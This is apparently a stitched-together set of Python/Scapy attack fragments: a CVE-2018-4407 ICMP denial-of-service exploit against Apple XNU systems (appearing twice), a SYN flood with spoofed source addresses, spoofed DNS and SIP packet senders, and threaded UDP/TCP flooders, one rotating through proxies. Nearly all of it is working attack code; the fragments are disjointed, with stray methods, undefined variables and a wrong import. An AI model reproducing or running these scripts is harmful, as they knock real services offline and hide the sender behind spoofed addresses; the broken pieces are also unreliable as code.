def cmd_tcpip(ip_src, ip_dst, TOS, ttl, id, reserved, seq_num, window, urg_ptr,
flags, payload, src_port):
layer3 = IP()
layer3.src = ip_src
layer3.dst = ip_dst
tos_num = int(TOS, 2)
print(tos_num)
layer3.tos = tos_num
layer3.ttl = ttl
layer3.ihl = 5
layer3.id = id
layer4 = TCP()
layer4.dport = 80
layer4.sport = src_port
num = int(reserved, 2)
binary_num = bin(num)
print(binary_num)
layer4.reserved = num
# layer4.flags = "S"
layer4.flags = flags
layer4.window = window
layer4.urgptr = int(urg_ptr, 2)
layer4.seq = seq_num
print("1")
if not payload:
pkt = layer3 / layer4
else:
pkt = layer3 / layer4 / payload
send(pkt)
def run(self):
RHOST = self.rhost
try:
print("[*] !!!!!!Dangerous operation!!!!!!")
print("[*] Trying CVE-2018-4407 ICMP DOS " + RHOST)
for i in range(8, 20):
send(
IP(dst=RHOST, options=[IPOption("A" * i)]) /
TCP(dport=2323, options=[(19, "1" * 18), (19, "2" * 18)]))
print("[*] Check Over!! ")
except Exception as e:
print("[*] usage: Requires root privileges run")
def cmd_ping(ip_dst, ip_src, seq, icmp_id):
conf.verb = False
layer3 = IP()
layer3.src = ip_src
layer3.dst = ip_dst
layer3.tos = 0
layer3.id = 1
layer3.flags = 0
layer3.frag = 0
layer3.ttl = 128
layer3.proto = 1 # icmp
layer4 = ICMP()
layer4.type = 8 # echo-request
layer4.code = 0
layer4.id = icmp_id
layer4.seq = seq
pkt = layer3 / layer4 / b"abcdefghijklmn opqrstuvwabcdefg hi"
send(pkt)
print("Ping Sent")
def syn_flood(dst_ip, dst_port):
# 先任意伪造4个ip地址
ips = ['11.1.1.2', '22.1.1.102', '33.1.1.2', '125.130.5.199']
# 选择任意一个端口号
# sums = 0
print('\nattacking....')
for src_port in range(1024, 65535):
# while 1:
# src_port = randrange(1024, 65535)
index = randrange(4)
ip_layer = IP(src=ips[index], dst=dst_ip)
tcp_layer = TCP(sport=src_port, dport=int(dst_port), flags='S')
send(ip_layer / tcp_layer, verbose=0) # verbose:是否输出发送结果
def dns_attack(dst_ip, src_ip):
a = IP(dst=dst_ip, src=src_ip) # 192.168.1.200 为伪造的源ip
b = UDP(dport=53)
c = DNS(id=1,
qr=0,
opcode=0,
tc=0,
rd=1,
qdcount=1,
ancount=0,
nscount=0,
arcount=0)
c.qd = DNSQR(qname='www.qq.com', qtype=1, qclass=1)
p = a / b / c
send(p)
def sip_message(ip_dst, ip_src, CallID, mf, contact):
sourcePort = 3001
destinationIp = ip_dst
sourceIp = ip_src
ip = IP(src=sourceIp, dst=destinationIp)
myPayload = (
'INVITE sip:{0}:5060;transport=tcp SIP/2.0\r\n'
'Via: SIP/2.0/UDP 192.168.44.32:5060;branch=1234\r\n'
'From: \"somedevice\"<sip:[email protected]:5060>;tag=5678\r\n'
'To: <sip:{0}:5060>\r\n'
'Call-ID: ' + CallID + ' \r\n'
'CSeq: 1 INVITE\r\n'
'Max-Forwards: ' + mf + '\r\n'
'Contact: <sip:' + contact + '@pc33.atlanta.com>\r\n'
'Content-Length: 0\r\n\r\n').format(destinationIp)
udp = UDP(dport=5060, sport=sourcePort)
send(ip / udp / myPayload)
def run(self):
data = random._urandom(1024)
p = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data)
go.wait()
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(url2),int(port)))
s.send(p)
print ("Request Sent! @", self.counter)
try:
for y in range(multiple):
s.send(str.encode(p))
except:
s.close()
except:
s.close()
def run(self):
data = random._urandom(1024)
p = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data)
current = x
if current < len(proxies):
proxy = proxies[current].strip().split(':')
else:
proxy = random.choice(proxies).strip().split(":")
go.wait()
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(url2),int(port)))
s.send(p)
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter)
try:
for y in range(multiple):
s.send(str.encode(p))
except:
s.close()
except:
s.close()
def main(argv):
print(argv)
try:
opts, args = getopt.getopt(sys.argv[1:], 's:e:', ['start=', 'end='])
except getopt.GetoptError:
sys.exit(2)
for opt, arg in opts:
if opt == '-s':
start = int(arg)
elif opt == '-e':
end = int(arg)
if start == '':
sys.exit()
if end == '':
sys.exit()
interface = popen('ifconfig | awk \'/eth0/ {print $1}\'').read()
for i in range(1000):
packets = Ether() / IP(dst=gendest(start, end),
src=sourceIPgen()) / UDP(dport=80, sport=2)
print(repr(packets))
sendp(packets, iface=interface.rstrip(), inter=0.1)
# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
import sys
from telnetlib import IP
from scapy.all import *
# try:
# from scapy.all import *
# except Exception as e:
# print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
from scapy.layers.inet import IPOption, TCP
if __name__ == '__main__':
try:
check_ip = sys.argv[1]
print("[*] !!!!!!Dangerous operation!!!!!!")
print("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
for i in range(8, 20):
send(IP(dst=check_ip, options=[IPOption("A"*i)])/TCP(dport=2323, options=[(19, "1"*18), (19, "2"*18)]))
print("[*] Check Over!! ")
except Exception as e:
print("[*] usage: sudo python check_icmp_dos.py 127.0.0.1")